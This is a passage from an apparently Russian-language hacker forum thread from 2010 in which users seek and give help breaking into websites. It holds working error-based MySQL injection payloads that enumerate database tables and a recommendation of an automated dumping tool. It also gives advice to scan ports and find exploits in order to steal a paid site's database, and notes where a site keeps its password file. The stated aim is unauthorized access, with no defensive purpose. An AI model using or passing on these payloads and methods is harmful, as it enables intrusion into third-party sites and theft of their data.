05.09.2010, 14:55
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
daniel_1024спасибо! разобрался
пароли храняца в /home/admin/.shadow
|
|
|
05.09.2010, 18:59
|
|
Новичок
Регистрация: 05.06.2010
Сообщений: 0
С нами:
8387532
Репутация:
0
|
|
Привет всем. Что можно сделать с этим?
Код:
warning: file_get_contents(http://site.ru/client/instructions.php?pid=dsadas%00) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home/betteam/public_html/includes/common.inc(1695) : eval()'d code on line 7.
|
|
|
|
05.09.2010, 19:01
|
|
Участник форума
Регистрация: 27.07.2010
Сообщений: 195
С нами:
8312726
Репутация:
7
|
|
Сообщение от just_panic
Привет всем. Что можно сделать с этим?
Код:
warning: file_get_contents(http://site.ru/client/instructions.php?pid=dsadas%00) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home/betteam/public_html/includes/common.inc(1695) : eval()'d code on line 7.
Это читалка, ничего с этим не сделаешь..
|
|
|
|
05.09.2010, 19:07
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
очень заинтересован базой одной сайты (инфа плтная).
адрес допустим такой:
http://site.aa.su/
если переходить по разделам, то адрес меняеться так: http://site.aa.su/раздел/
т.е. никаких файлов нету, чтоб мне понять что к чему.
сайт самописный.
Как узнать что за БД ?? и возможноси проникновения ?
|
|
|
|
05.09.2010, 22:30
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от B1t.exe
очень заинтересован базой одной сайты (инфа плтная).
адрес допустим такой:
http://site.aa.su/
если переходить по разделам, то адрес меняеться так: http://site.aa.su/раздел/
т.е. никаких файлов нету, чтоб мне понять что к чему.
сайт самописный.
Как узнать что за БД ?? и возможноси проникновения ?
Пробуй фаззинг, либо сам подбирай верный запрос, опираясь на логику скрипта.
Если совсем глухо и не получается сломать из веба, сканируй открытые порты, смотри, что на них висит, коннекться к ним телнетом, чтобы узнать версии демонов и ищи под них эксплойты.
То, что ты описал, называется Mod_Rewrite.
|
|
|
|
06.09.2010, 00:23
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
С нами:
11010660
Репутация:
439
|
|
есть запрос
Код:
+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+206,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
есть ли возможность вывести весь список таблиц в блайнд-скуле? |
|
|
|
06.09.2010, 00:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от BrainDeaD
есть запрос
Код:
+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+206,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
есть ли возможность вывести весь список таблиц в блайнд-скуле? юзай havij, лимитом перебирает все, а так груп конкат не юзать все равно )
|
|
|
|
06.09.2010, 00:42
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
Сообщение от None
Пробуй фаззинг, либо сам подбирай верный запрос, опираясь на логику скрипта.
Не знаю чем и как делать (
Сообщение от None
сканируй открытые порты, смотри, что на них висит
никак не получаеться. я думаю специально сделали на домене 3_го уровня, чтоб невозможно было даже IP адрес ловить. встроенные утилиты wind ничего не могут определить(ping, nslookup, tracert), т.е. IP адрес.
А вот XSpider тоже молчит ****:
Сообщение от None
Сканирование хоста не производилось, так как невозможно получить IP-адрес по заданному имени хоста.
|
|
|
|
06.09.2010, 00:53
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
С нами:
11010660
Репутация:
439
|
|
Сообщение от Konqi
юзай havij, лимитом перебирает все, а так груп конкат не юзать все равно )
ок. попробую.
а что на счёт бенчмарка с переменными? типа
Код:
concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCAT(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by table_name+LIMIT+1))),@o)
никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил?
|
|
|
|
06.09.2010, 06:10
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от BrainDeaD
ок. попробую.
а что на счёт бенчмарка с переменными? типа
Код:
concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCAT(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by table_name+LIMIT+1))),@o)
никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил? Все равно вывести все таблицы за один запрос в ошибке не получиться, так как, метод floor rand - имеет ограничение в 64 символа, а метод основанный на выборке записи по средствам XPath - 31 символ.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
